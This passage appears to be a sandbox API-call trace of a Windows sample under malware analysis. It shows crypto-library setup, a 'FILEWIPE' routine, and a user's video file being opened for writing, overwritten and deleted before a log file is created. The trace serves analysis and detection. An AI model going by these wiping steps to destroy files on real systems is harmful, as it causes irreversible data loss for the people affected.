lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.257] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0043.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.257] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.257] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.257] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.257] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.257] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.257] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0043.257] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0043.258] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.258] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0043.258] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0043.258] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0043.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0043.258] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0043.258] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.258] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0043.258] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.258] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.258] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0043.258] FreeLibrary (hLibModule=0x754b0000) returned 1 [0043.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0043.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0043.258] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0043.258] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0043.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0043.258] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.259] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.259] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.259] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.259] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0043.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0043.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.260] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.260] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.260] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa178d950, ftCreationTime.dwHighDateTime=0x1d5c0ab, ftLastAccessTime.dwLowDateTime=0x22ef5700, ftLastAccessTime.dwHighDateTime=0x1d5c284, ftLastWriteTime.dwLowDateTime=0x22ef5700, ftLastWriteTime.dwHighDateTime=0x1d5c284, nFileSizeHigh=0x0, nFileSizeLow=0x1dee, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Myt71e.flv", cAlternateFileName="")) returned 0x7c2100 [0043.260] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0043.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0043.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.260] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.260] CharLowerBuffW (in: lpsz="byte[7662]", cchLength=0xa | out: lpsz="byte[7662]") returned 0xa [0043.260] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.260] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0043.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.260] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.261] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0043.261] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0043.261] FreeLibrary (hLibModule=0x76b40000) returned 1 [0043.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0043.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0043.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0043.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0043.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0043.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0043.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0043.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0043.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0043.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0043.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0043.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0043.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0043.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0043.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0043.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0043.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0043.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0043.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0043.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0043.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0043.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0043.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0043.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.262] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.262] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.262] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.262] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0043.262] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.262] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.262] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.262] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.262] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.262] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.262] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.262] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.262] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.262] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.262] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.262] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.262] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.262] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.262] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.262] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.263] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0043.263] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.263] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\myt71e.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0043.263] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.263] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.263] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.263] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.263] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0043.263] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.263] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.263] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.264] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.264] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.264] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.264] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.264] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.264] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0043.264] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.264] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.264] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.264] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.264] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.264] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.264] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.264] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv", lpFilePart=0x0) returned 0x3e [0043.264] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa178d950, ftCreationTime.dwHighDateTime=0x1d5c0ab, ftLastAccessTime.dwLowDateTime=0x22ef5700, ftLastAccessTime.dwHighDateTime=0x1d5c284, ftLastWriteTime.dwLowDateTime=0x197dc960, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1dee, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="Myt71e.flv", cAlternateFileName="")) returned 0x7c2100 [0043.264] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\myt71e.flv")) returned 1 [0043.266] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa178d950, ftCreationTime.dwHighDateTime=0x1d5c0ab, ftLastAccessTime.dwLowDateTime=0x22ef5700, ftLastAccessTime.dwHighDateTime=0x1d5c284, ftLastWriteTime.dwLowDateTime=0x197dc960, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1dee, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="Myt71e.flv", cAlternateFileName="")) returned 0 [0043.266] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0043.266] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.267] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0043.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0043.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0043.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0043.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0043.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0043.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0043.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0043.267] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0043.267] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0043.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.267] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.267] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.267] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.267] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.267] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0043.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.267] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0043.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0043.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.268] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0043.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0043.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0043.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.268] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0043.268] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0043.268] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.268] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0043.268] SetFilePointerEx 